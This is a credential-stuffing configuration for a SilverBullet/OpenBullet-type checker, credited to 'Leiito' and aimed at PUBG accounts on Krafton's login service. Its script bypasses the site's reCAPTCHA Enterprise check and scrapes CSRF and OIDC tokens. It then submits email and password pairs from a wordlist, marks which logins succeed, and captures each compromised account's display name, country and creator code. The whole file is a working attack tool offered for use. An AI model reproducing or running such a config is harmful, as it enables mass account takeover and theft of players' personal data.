[SETTINGS]
{
  "Name": "Pubg V4 -Leiito-",
  "SuggestedBots": 50,
  "MaxCPM": 0,
  "LastModified": "2022-01-22T10:33:32.627451-08:00",
  "AdditionalInfo": "",
  "RequiredPlugins": [
    "RecaptchaV3Bypass"
  ],
  "Author": "Leiito",
  "Version": "1.1.2 [SB]",
  "SaveEmptyCaptures": false,
  "ContinueOnCustom": false,
  "SaveHitsToTextFile": false,
  "IgnoreResponseErrors": false,
  "MaxRedirects": 8,
  "NeedsProxies": false,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "BanProxyAfterGoodStatus": false,
  "BanLoopEvasionOverride": -1,
  "EncodeData": false,
  "AllowedWordlist1": "",
  "AllowedWordlist2": "",
  "DataRules": [],
  "CustomInputs": [],
  "CaptchaUrl": "",
  "IsBase64": false,
  "FilterList": [],
  "EvaluateMathOCR": false,
  "SecurityProtocol": 0,
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "QuitOnBanRetry": false,
  "AcceptInsecureCertificates": true,
  "DisableNotifications": false,
  "DisableImageLoading": false,
  "DefaultProfileDirectory": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": "",
  "Title": "Pubg V4 -Leiito-",
  "IconPath": "Icon\\svbfile.ico",
  "LicenseSource": null,
  "Message": null,
  "MessageColor": "#FFFFFFFF",
  "HitInfoFormat": "[{hit.Type}][{hit.Proxy}] {hit.Data} - [{hit.CapturedString}]",
  "AuthorColor": "#FFFFB266",
  "WordlistColor": "#FFB5C2E1",
  "BotsColor": "#FFA8FFFF",
  "CustomInputColor": "#FFD6C7C7",
  "CPMColor": "#FFFFFFFF",
  "ProgressColor": "#FFAD93E3",
  "HitsColor": "#FF66FF66",
  "CustomColor": "#FFFFB266",
  "ToCheckColor": "#FF7FFFD4",
  "FailsColor": "#FFFF3333",
  "RetriesColor": "#FFFFFF99",
  "OcrRateColor": "#FF4698FD",
  "ProxiesColor": "#FFFFFFFF"
}

[SCRIPT]
RecaptchaV3Bypass "https://www.google.com/recaptcha/enterprise/anchor?ar=1&k=6LfapbYUAAAAAGqqePOX3oiNl5O0L7YWwoztq0cC&co=aHR0cHM6Ly9hY2NvdW50cy5rcmFmdG9uLmNvbTo0NDM.&hl=en&v=VZKEDW9wslPbEc9RmzMqaOAP&size=invisible&cb=8oot2px26fzb" "" "https://recaptcha.net/recaptcha/enterprise/reload?k=6LfapbYUAAAAAGqqePOX3oiNl5O0L7YWwoztq0cC" -> VAR "TR" 
  

REQUEST GET "https://accounts.krafton.com/oidc/auth?client_id=cee838e9-4987-411c-8274-89ed8bf81b4d&redirect_uri=https://na.battlegrounds.pubg.com&response_type=code&scope=openid&state=c41ca2a592f340888df8d85fc078911c&code_challenge=8qEdH0egUzdYSXjoWs0evnukkcXzW9uojbLqAWC33b0&code_challenge_method=S256&response_mode=query" 
  
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 

PARSE "<SOURCE>" LR "name=\"_csrf\" value=\"" "\"/>" -> VAR "csrf" 

PARSE "<SOURCE>" LR "href=\"/oidc/interaction/" "/abort" -> VAR "link" 

REQUEST POST "https://accounts.krafton.com/auth/local" 
  CONTENT "_csrf=<csrf>&oidc_client=cee838e9-4987-411c-8274-89ed8bf81b4d&recaptcha=<TR>&email=<USER>&password=<PASS>&faction=" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36" 
  HEADER "origin: https://accounts.krafton.com" 
  HEADER "referer: https://accounts.krafton.com/oidc/interaction/<link>" 
  HEADER "sec-fetch-dest: document" 
  HEADER "sec-fetch-mode: navigate" 
  HEADER "sec-fetch-site: same-origin" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 

KEYCHECK 
  KEYCHAIN Failure OR 
    KEY "Create Account" 
  KEYCHAIN Success OR 
    KEY "PUBG API" 

REQUEST GET "https://accounts.krafton.com/profile" 
  
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 

PARSE "<SOURCE>" LR "\"display_name\":\"" "\",\"" CreateEmpty=FALSE -> CAP "NAME = " 

PARSE "<SOURCE>" LR "\"country\":\"" "\",\"" CreateEmpty=FALSE -> CAP "COUNTRY = " 

PARSE "<SOURCE>" LR "\"creator_code\":\"" "\",\"" CreateEmpty=FALSE -> CAP "CODE = " 

PARSE "<SOURCE>" LR "\"creator_name\":\"" "\",\"" CreateEmpty=FALSE -> CAP "creator_name = " 

FUNCTION Constant "Author Leiito" -> CAP "Author Leiito" 

